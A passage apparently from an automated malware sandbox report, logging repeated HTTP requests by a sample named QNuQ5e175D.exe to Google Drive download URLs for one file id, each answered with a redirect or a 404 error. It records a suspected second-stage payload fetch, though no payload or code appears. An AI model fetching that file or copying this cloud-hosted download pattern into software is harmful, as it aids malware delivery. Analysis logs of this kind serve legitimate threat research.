                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-3_WqSIdSnW6Nt6VW4MpnKg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                      59  192.168.2.11  50039  142.250.184.225  443  7988  C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp  Bytes transferred  Direction  Data
                                                      2025-01-11 04:07:07 UTC  466  OUT  GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:08 UTC  1844  IN  HTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFiumC6F1Gqhs39DhXemrL3IGwOBftFnWz0tQcSoD41wiFrlttNK0A2QGt_26RY0rNKsMZmz
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:08 GMT
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: script-src 'nonce-Y5FI-lUMHjDm76mBcQGAJg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:07:08 UTC  1652  IN  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ZwvFUpuzx7ni8LR48c4-jA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                      60  192.168.2.11  50040  172.217.16.142  443  7988  C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp  Bytes transferred  Direction  Data
                                                      2025-01-11 04:07:08 UTC  424  OUT  GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:09 UTC  1920  IN  HTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:09 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-wxPkvX2YDFoTTiaSi_SqEA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                      61  192.168.2.11  50041  142.250.184.225  443  7988  C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp  Bytes transferred  Direction  Data
                                                      2025-01-11 04:07:10 UTC  466  OUT  GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:10 UTC  1844  IN  HTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFiumC55pC5XUPdIHCvhIPJJ0lwtQSua15A-UjuFCv8GWn6kk3Kk06RykxMbtXxSmnNT5LYW
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:10 GMT
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Security-Policy: script-src 'nonce-XxdxbcX2v9B9FMfbYiw6pg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:07:10 UTC  1652  IN  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jGRhe8gHprBO4yGa1TW_-A">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                      62  192.168.2.11  50042  172.217.16.142  443  7988  C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp  Bytes transferred  Direction  Data
                                                      2025-01-11 04:07:11 UTC  424  OUT  GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:11 UTC  1920  IN  HTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:11 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Content-Security-Policy: script-src 'nonce-gpsJDL8Gv1i6aTO-vKPcNg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                      63  192.168.2.11  50043  142.250.184.225  443  7988  C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp  Bytes transferred  Direction  Data
                                                      2025-01-11 04:07:12 UTC  466  OUT  GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:12 UTC  1844  IN  HTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFiumC624ajSIfGzut2cDFCCMVIQXkSYMdtQbco-CWxL5CAuDJpnCF-qnbwNFiOL3Dpo89pY
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:12 GMT
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-50XjqCsO5A_HWlElcgQjKQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:07:12 UTC  1652  IN  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="XdjUuvL1uNvrC-3yPE_3Lg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                      64  192.168.2.11  50044  172.217.16.142  443  7988  C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp  Bytes transferred  Direction  Data
                                                      2025-01-11 04:07:13 UTC  424  OUT  GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:14 UTC  1920  IN  HTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:13 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-XeH41ixCPlkLLnoxsNuFVg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                      65  192.168.2.11  50045  142.250.184.225  443  7988  C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp  Bytes transferred  Direction  Data
                                                      2025-01-11 04:07:14 UTC  466  OUT  GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:15 UTC  1851  IN  HTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgT4uuRPg2l-5AiBPijV9u2-_M1B_K0sJ0058W5N0wx43cawg7SM_MehnHfClgFBuGbbwDpEBJM
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:15 GMT
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-egoQtzVXlHtqRHtsB8mn_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:07:15 UTC  1652               IN
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="3rFH9OR7rB2UmN8JbtRmrw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session ID  Source IP     Source Port  Destination IP   Destination Port  PID   Process
                                                      66          192.168.2.11  50046        172.217.16.142   443               7988  C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp                Bytes transferred  Direction  Data
                                                      2025-01-11 04:07:15 UTC  424                OUT        GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:16 UTC  1920               IN         HTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:16 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy: script-src 'nonce-2iGl46ScZ_7097QimDg5sw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session ID  Source IP     Source Port  Destination IP   Destination Port  PID   Process
                                                      67          192.168.2.11  50047        142.250.184.225  443               7988  C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp                Bytes transferred  Direction  Data
                                                      2025-01-11 04:07:16 UTC  466                OUT        GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:17 UTC  1844               IN         HTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgQPqmjTMI653FfBuSHtnmV9dS7DUF62QsZBbW9nNns1d9jH811d0OjPRDYY2aW7HqfL
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:17 GMT
